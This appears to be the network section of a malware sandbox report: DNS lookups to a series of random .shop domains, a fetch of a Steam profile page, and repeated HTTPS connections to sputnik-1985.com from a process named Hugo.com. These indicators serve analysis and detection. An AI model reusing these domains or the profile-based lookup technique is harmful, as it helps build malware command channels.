                                                                                                                                                                                                            Jan 7, 2025 15:45:58.224761963 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.224833012 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.224833965 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.224880934 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.225039959 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.225059986 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.225071907 CET50738443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.225078106 CET44350738104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.341146946 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.341196060 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.341276884 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.341574907 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.341586113 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.807378054 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.807522058 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.808721066 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.808732986 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.808981895 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.810139894 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.810282946 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:58.810321093 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.396249056 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.396357059 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.396429062 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.396598101 CET50739443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.396617889 CET44350739104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.483097076 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.483133078 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.483206034 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.483537912 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.483551979 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.958556890 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.958646059 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.959908009 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.959927082 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.960160971 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.961437941 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.961577892 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.961611986 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:59.961833954 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.007340908 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.376817942 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.376912117 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.376976967 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.378298044 CET50740443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.378315926 CET44350740104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.591464043 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.591517925 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.591598034 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.591902018 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:00.591913939 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.049165010 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.049259901 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.050528049 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.050538063 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.050780058 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.051954031 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.052083969 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.052107096 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.052177906 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.052184105 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.705703974 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.705797911 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.705869913 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.705986977 CET50741443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.706002951 CET44350741104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.882211924 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.882256031 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.882328987 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.882647038 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:01.882659912 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.386708021 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.386841059 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.388113976 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.388127089 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.388364077 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.389506102 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.389592886 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.389599085 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.735874891 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.735985994 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.736192942 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.736280918 CET50742443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:02.736300945 CET44350742104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.155977964 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.156033039 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.156105042 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.156819105 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.156831026 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.635621071 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.635727882 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.636984110 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.636989117 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.637207031 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.638330936 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.638407946 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:03.638413906 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.178708076 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.178797960 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.178962946 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.179207087 CET50743443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.179229021 CET44350743104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.180952072 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.180999994 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.181099892 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.181411028 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.181426048 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.797584057 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.797694921 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.799034119 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.799045086 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.799278975 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.800472021 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.800499916 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:04.800540924 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:05.278664112 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:05.278753996 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:05.278836012 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:05.278992891 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:05.279015064 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:46:05.279027939 CET50744443192.168.2.6104.21.64.1
                                                                                                                                                                                                            Jan 7, 2025 15:46:05.279035091 CET44350744104.21.64.1192.168.2.6
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 7, 2025 15:45:19.073262930 CET5782053192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:19.082894087 CET53578201.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:51.687833071 CET5360214162.159.36.2192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:52.305670977 CET53602111.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.860075951 CET6419653192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.869333029 CET53641961.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.878017902 CET5923853192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.891154051 CET53592381.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.902008057 CET6121353192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.909256935 CET53612131.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.914007902 CET5255853192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.925497055 CET53525581.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.929023981 CET6130453192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.937640905 CET53613041.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.941155910 CET5162553192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.947957039 CET53516251.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.953022957 CET6359553192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.964819908 CET53635951.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.972074032 CET6031353192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.978986025 CET53603131.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.988059998 CET5069953192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.067394018 CET53506991.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.072412968 CET5337453192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.079068899 CET53533741.1.1.1192.168.2.6
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.359956026 CET6195053192.168.2.61.1.1.1
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET53619501.1.1.1192.168.2.6
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 7, 2025 15:45:19.073262930 CET192.168.2.61.1.1.10xe084Standard query (0)EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKygA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.860075951 CET192.168.2.61.1.1.10x1862Standard query (0)lastlossunbag.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.878017902 CET192.168.2.61.1.1.10x2f3aStandard query (0)nearycrepso.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.902008057 CET192.168.2.61.1.1.10xd530Standard query (0)abruptyopsn.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.914007902 CET192.168.2.61.1.1.10x19d7Standard query (0)wholersorie.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.929023981 CET192.168.2.61.1.1.10x6faStandard query (0)framekgirus.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.941155910 CET192.168.2.61.1.1.10xb1dbStandard query (0)tirepublicerj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.953022957 CET192.168.2.61.1.1.10x84bStandard query (0)noisycuttej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.972074032 CET192.168.2.61.1.1.10x3fcStandard query (0)rabidcowse.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.988059998 CET192.168.2.61.1.1.10xd0e2Standard query (0)cloudewahsj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.072412968 CET192.168.2.61.1.1.10xfbddStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.359956026 CET192.168.2.61.1.1.10xa865Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 7, 2025 15:45:07.535725117 CET1.1.1.1192.168.2.60x7a67No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:07.535725117 CET1.1.1.1192.168.2.60x7a67No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:19.082894087 CET1.1.1.1192.168.2.60xe084Name error (3)EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKygnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.869333029 CET1.1.1.1192.168.2.60x1862Name error (3)lastlossunbag.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.891154051 CET1.1.1.1192.168.2.60x2f3aName error (3)nearycrepso.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.909256935 CET1.1.1.1192.168.2.60xd530Name error (3)abruptyopsn.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.925497055 CET1.1.1.1192.168.2.60x19d7Name error (3)wholersorie.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.937640905 CET1.1.1.1192.168.2.60x6faName error (3)framekgirus.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.947957039 CET1.1.1.1192.168.2.60xb1dbName error (3)tirepublicerj.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.964819908 CET1.1.1.1192.168.2.60x84bName error (3)noisycuttej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:54.978986025 CET1.1.1.1192.168.2.60x3fcName error (3)rabidcowse.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.067394018 CET1.1.1.1192.168.2.60xd0e2Name error (3)cloudewahsj.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:55.079068899 CET1.1.1.1192.168.2.60xfbddNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET1.1.1.1192.168.2.60xa865No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET1.1.1.1192.168.2.60xa865No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET1.1.1.1192.168.2.60xa865No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET1.1.1.1192.168.2.60xa865No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET1.1.1.1192.168.2.60xa865No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET1.1.1.1192.168.2.60xa865No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 7, 2025 15:45:56.369052887 CET1.1.1.1192.168.2.60xa865No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                            • sputnik-1985.com
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.650736104.102.49.2544436596C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-07 14:45:55 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            2025-01-07 14:45:56 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Tue, 07 Jan 2025 14:45:56 GMT
                                                                                                                                                                                                            Content-Length: 35126
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=a28b06deabeb10a47d755616; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2025-01-07 14:45:56 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                            2025-01-07 14:45:56 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                            Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                            2025-01-07 14:45:56 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                            Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                            2025-01-07 14:45:56 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
